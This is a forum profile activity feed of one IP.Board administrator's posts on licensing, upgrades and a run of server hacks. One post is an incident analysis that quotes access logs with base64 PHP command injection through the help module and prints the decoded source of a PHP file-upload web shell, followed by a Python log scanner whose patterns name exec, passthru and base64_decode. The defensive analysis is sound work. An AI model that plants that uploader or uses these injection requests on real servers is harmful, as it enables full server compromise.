SeanQ

SeanQ's Activity

  1. SeanQ added a comment on a blog entry: IP.Board 3.3.x, 3.4.x Security Update

    Let's say I applied this patch on my 3.4.6 board 2 days ago. Today I upgraded to 3.4.7.
    Am I going to have to update again?
  2. SeanQ added a post in a topic: License key listed as expired?

    Thanks Mark, where can I tell that it was approved? I used PP so I assume it was auto approved.
    Under purchases it states -
    Expires
    17 Jun 2015
  3. SeanQ added a post in a topic: License key listed as expired?

    Hey,
    So recently my key was removed from the board, so I re-added it. But when I re-added it I also needed to renew the purchase, which I did, but on the admin page it still says the key is expired even though I just renewed. Is there any way to force IPB to recheck the key? I've restarted the server but the status has not changed.

  4. SeanQ added a post in a topic: Hacked 3 times in a row on 2 different versions of IPB

    Nope, but we've installed a pretty decent monitoring script which sends a PHP email every time someone does anything on the site. When we get hacked for the 4th time now, we'll know exactly how he does it and where the vulnerability is. Once we've isolated the cause, we're going to submit it to the appropriate place, be it the shoutbox thread or, if it's an issue with IPB itself, report it to the team.
    EDIT:
    How exactly can we force a global password reset? The hacker has taken our DB, and I would like to make that version of the DB unusable as soon as possible.
  5. SeanQ added a post in a topic: Hacked 3 times in a row on 2 different versions of IPB   

    We are absolutely certain this isn't the issue. Not only is this not the issue, but we've isolated every possible malware related cause and we can pretty much confirm this isn't it. A completely clean installation of IPB, on a completely new and clean server, on completely new accounts (ftp not even set up), with a completely clean and new shoutbox, is still getting hacked. If you're still unsure, we had one of our server admins install all of this on his own on a virtual machine. So his computer can't have been trojan'd.
     
    I'm not really sure what to do here. We're a pretty big site, and we've been down for very long because the hacker seems to have an unknown grudge against us.
  6. SeanQ added a post in a topic: Hacked 3 times in a row on 2 different versions of IPB

    Nothing to do with password or FTP account issues at all; all passwords get 100% for their security rating (10-15 chars (aA0-9! etc.)).
    Also we don't have any bruteforce logs, only PHP logs.
    Also this was on a new server, not the same one, so not a backdoor or a bad password (as FTP accounts weren't set up yet).
    csf is installed and at 100% green.
    SSH was set to a random port and denied password connections and needed a key file to log in, same with FTP.

    Anyways, going through the access-logs files we've found the exploit. It seems to have to do with accounts > the shoutbox hook > the Help section of the site (index.php?app=core&module=help&_b=)

    This command is run right before the files are added (obviously, as the following commands create the files):
    31.193.15.136 - - [13/Jun/2013:10:13:47 -0400] "GET /forum/index.php?&app=shoutbox&module=ajax&section=coreAjax&secure_key=e96047891b4ee24594bf29d7b5705d72&type=getShouts&lastid=669&global=1 HTTP/1.1" 200 1435 "http://fkn0wned.net/forum/index.php?app=core&module=help&_b=cGFzc3RocnUoJ2xzJyk7" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0"
    31.193.15.136 - - [13/Jun/2013:10:14:15 -0400] "GET /forum/index.php?&app=shoutbox&module=ajax&section=coreAjax&secure_key=a106a4547f538a9fa97b5f32b363ee83&type=getShouts&lastid=670&global=1 HTTP/1.1" 200 879 "http://fkn0wned.net/forum/index.php?app=core&module=help&k=a106a4547f538a9fa97b5f32b363ee83&setlanguage=1&langurlbits=app=core&module=help&cal_id=&langid=2&_b=ZWNobyAxOw==" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36"
    31.193.15.136 - - [13/Jun/2013:10:14:17 -0400] "GET /forum/index.php?&app=shoutbox&module=ajax&section=coreAjax&secure_key=e96047891b4ee24594bf29d7b5705d72&type=getShouts&lastid=670&global=1 HTTP/1.1" 200 1367 "http://fkn0wned.net/forum/index.php?app=core&module=help&_b=cGFzc3RocnUoJ2xzJyk7" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0"
    31.193.15.136 - - [13/Jun/2013:10:14:17 -0400] "GET /forum/public/style_emoticons/default/biggrin.png HTTP/1.1" 200 973 "http://fkn0wned.net/forum/index.php?app=core&module=help&_b=cGFzc3RocnUoJ2xzJyk7" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0"
    31.193.15.136 - - [13/Jun/2013:10:14:30 -0400] "GET /forum/index.php?app=core&module=help&_b=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 HTTP/1.1" 200 14902 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0"
    The above is Base64; converted, it makes this:
    $fh = fopen("interface/dong.php", "w"); fwrite($fh, base64_decode("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"));
    If we decode this:
    <?php
    echo '<font color='Green'>@Zixem<3</font><hr /><form method="post" enctype="multipart/form-data" action=""> <u>Upload file.</u> <br/> <input type="file" name="file_name" /> <input type="submit" value="Upload" name="upload_file" /> </form>';
    if(isset($_POST['upload_file'])) {
        if(move_uploaded_file($_FILES['file_name']['tmp_name'],$_GET['p']."/".$_FILES['file_name']['name'])) {
            echo "<font color='Green'><center>File uploaded successfully(<font color='Black'><i>{$_FILES['file_name']['name']}</font></i>).</center></font></center>";
        } else {
            echo "<font color='Red'><center>File does not uploaded(<font color='Black'><i>{$_FILES['file_name']['name']}</font></center></i>).</font></center>";
        }
    }
    ?>
    So that was the uploader _--_
    31.193.15.136 - - [13/Jun/2013:10:14:33 -0400] "GET /forum/interface/dong.php HTTP/1.1" 200 232 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36"
    31.193.15.136 - - [13/Jun/2013:10:14:47 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36"
    31.193.15.136 - - [13/Jun/2013:10:14:49 -0400] "GET /forum/interface/b_.php HTTP/1.1" 200 120 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36"
    31.193.15.136 - - [13/Jun/2013:10:14:49 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36"
    Anyways, after dong.php was created, shortly later b_.php was created. This was just the shell, which I won't post, and well, once the shell is uploaded they would have full access.
    If anyone wants to view the full access-logs and spread some light on the issue:
    http://pastebin.com/VhBi71gU
    The log file has been isolated to only include the originating server.

    I suggest you block IP 136.15.193.31 - 0day server, which is where this exploit started.
    From what I can see, any IPB board running SB (both the old (1.2) version of the shoutbox and the new beta (1.4) version were installed during this exploit) on a clean install with no hardening done would be exposed to this exploit, unless someone wants to explain these messages.


    You don't go to a poker game and show your hand on the deal
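The post above found the intrusion by reading access logs for a base64-encoded `_b=` parameter on the help module. The following is an added example, not code from the thread or from IP.Board, of how a defender can scan Apache combined-format logs for that pattern; the sample log lines are constructed with a documentation IP address and the host name forum.example, and only the base64 values quoted in the post are reused.

```python
# Added example, not from the thread: scan Apache combined-format access log lines
# for base64 PHP in the help module's `_b=` parameter. Sample lines are constructed.
import base64, binascii, re
from urllib.parse import unquote, urlsplit
# ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<req>[^"]*)" '
                    r'\d{3} \S+ "(?P<ref>[^"]*)" "[^"]*"$')
# A decoded URL parameter should never contain PHP statements like these.
PHP_MARKERS = re.compile(r"\b(?:passthru|system|exec|shell_exec|eval|fopen|fwrite"
                         r"|base64_decode)\s*\(|^\s*echo\b")

def b_values(url):
    """Raw `_b` values; parsed by hand since parse_qs turns '+' (base64) into a space."""
    vals = []
    for pair in urlsplit(url).query.split("&"):
        key, sep, val = pair.partition("=")
        if key == "_b" and sep:
            vals.append(unquote(val))
    return vals

def decode_b(value):
    """Base64-decode one `_b` value, tolerating stripped padding; None if invalid."""
    padded = value + "=" * (-len(value) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def scan(lines):
    """(ip, time, where, decoded) for each `_b` in the request URL or Referer that is PHP."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format: skip rather than crash
        url = (m["req"].split(" ") + [""])[1]  # "GET /path HTTP/1.1" -> /path
        for where, u in (("request", url), ("referer", m["ref"])):
            for decoded in filter(None, map(decode_b, b_values(u))):
                if PHP_MARKERS.search(decoded):
                    hits.append((m["ip"], m["time"], where, decoded))
    return hits

# Constructed: a benign help-page hit, then the two patterns quoted in the post
# (passthru() in the Referer of a shoutbox poll, an "echo 1;" probe in the request).
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Jun/2013:10:13:40 -0400] "GET /forum/index.php?app=core'
    '&module=help&_b=cGFnZT0y HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [13/Jun/2013:10:13:47 -0400] "GET /forum/index.php?&app=shoutbox'
    '&module=ajax&type=getShouts&lastid=669 HTTP/1.1" 200 1435 "http://forum.example'
    '/forum/index.php?app=core&module=help&_b=cGFzc3RocnUoJ2xzJyk7" "Mozilla/5.0"',
    '203.0.113.5 - - [13/Jun/2013:10:14:15 -0400] "GET /forum/index.php?app=core'
    '&module=help&_b=ZWNobyAxOw== HTTP/1.1" 200 879 "-" "Mozilla/5.0"',
]
```

Checking the Referer as well as the request line matters here: in the post's logs the payload only shows up in the Referer of the shoutbox's polling requests, so a scan of request URLs alone would miss the first sign of it.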
  7. SeanQ added a post in a topic: Hacked 3 times in a row on 2 different versions of IPB   

    Well we have a person who works as a server manager at a pretty big datacenter. He too is tied up about how they're doing this. However, what is the interface folder used for? Would it damage the board if we got rid of it completely?
    EDIT:
    Oh wait, that's where the IPB main files are stored.
    EDIT2:
    I'll pay anyone 50 bucks to help secure the server and find out how he gets in successfully. I'd love you forever.
    EDIT3:
    The only thing in common has been the skin on all 3 installations. Our graphics designer is pretty bad at coding, so there might be some holes here and there. Is that even possible? To get full server access through some shoddy skin code?
  8. SeanQ added a post in a topic: Hacked 3 times in a row on 2 different versions of IPB

    He uploaded the shell to the interface section of the server twice. Isn't that where all the extra stuff is linked? How do we disable that?
  9. SeanQ added a post in a topic: Hacked 3 times in a row on 2 different versions of IPB

    Alright, now it's getting silly. We've been hacked 3 times. The first 2 times, we thought individual IPB plugins caused it. However, on the 3rd time, we were on a completely new server with no plugins, a fresh install of IPB, new user accounts, new passwords for server-related stuff, and everything new. And they STILL got in.

    Is there some exploit with IPB going on at the moment? The hacker claims that we can't ever fix it no matter how many times we switch servers and reset.
  10. SeanQ added a post in a topic: Anyone had this problem with their shoutbox?   

    Basically, the whole forum index loads inside the shoutbox and the refresh thing refreshes a hundred times a second. The actual index is gone and you'll have to browse the site through the shoutbox. I'm using the latest version (1.4.1 beta 1b) of the shoutbox. Should I downgrade to 1.4.0? It didn't say if that one was compatible with 3.4.x of IPB.

  11. SeanQ added a post in a topic: Importing old DB to new site(new version)

    Um wow, nvm. I did what I said above and IPB realized it needed to be upgraded .. /impressed
    This topic can be closed, my apologies.
  12. SeanQ added a post in a topic: Importing old DB to new site(new version)

    Hi there,

    I've recently installed 3.4.5 and I have a DB from 3.3.2 that I want to import into the fresh install.
    Now I know how I would normally import a db into a table: I could delete the current table that IPB made and then
    remake an empty table, then just run the command
    mysql db_name < db.sql

    but I'm worried that this will cause errors. I can't run the upgrade option because this is a new server.
    Is there any way to convert a 3.3.2 db into a 3.4.5 db?

    Thanks
  13. SeanQ added a post in a topic: Reinstalled IPB and now no plugins will work   

    I've reimported, recached (including skins), and I've also tried replacing the xml files with the ones from my HD in case they were corrupted somehow. Nothing has worked.
    EDIT:
    It's really strange, because everything works except hooks and plugins. None of those are functional at all. This includes the shoutbox, and even modules from the IP team themselves, like the downloads manager.
  14. SeanQ added a post in a topic: Reinstalled IPB and now no plugins will work

    Someone got into our server by abusing a vulnerability with the awards plugin we were using, and he deleted the index page + cpanel. Nothing else was done, since he locked himself out by deleting cpanel.

    The index page being gone was a bigger problem than we'd thought, and we decided to simply reinstall IPB with the same database and everything. However, even though it's the same IPB version, no hooks or plugins will work. We're using IPB version 3.3.4, and have been reluctant to upgrade because we're dependent on so many community hooks.
  15. SeanQ added a post in a topic: Loading an older backup to downgrade: For some reason it's loading the old forum   

    I did load the old database, but it still gives me this.
    It's giving me this:
    http://i.imgur.com/5YdVkLu.png
     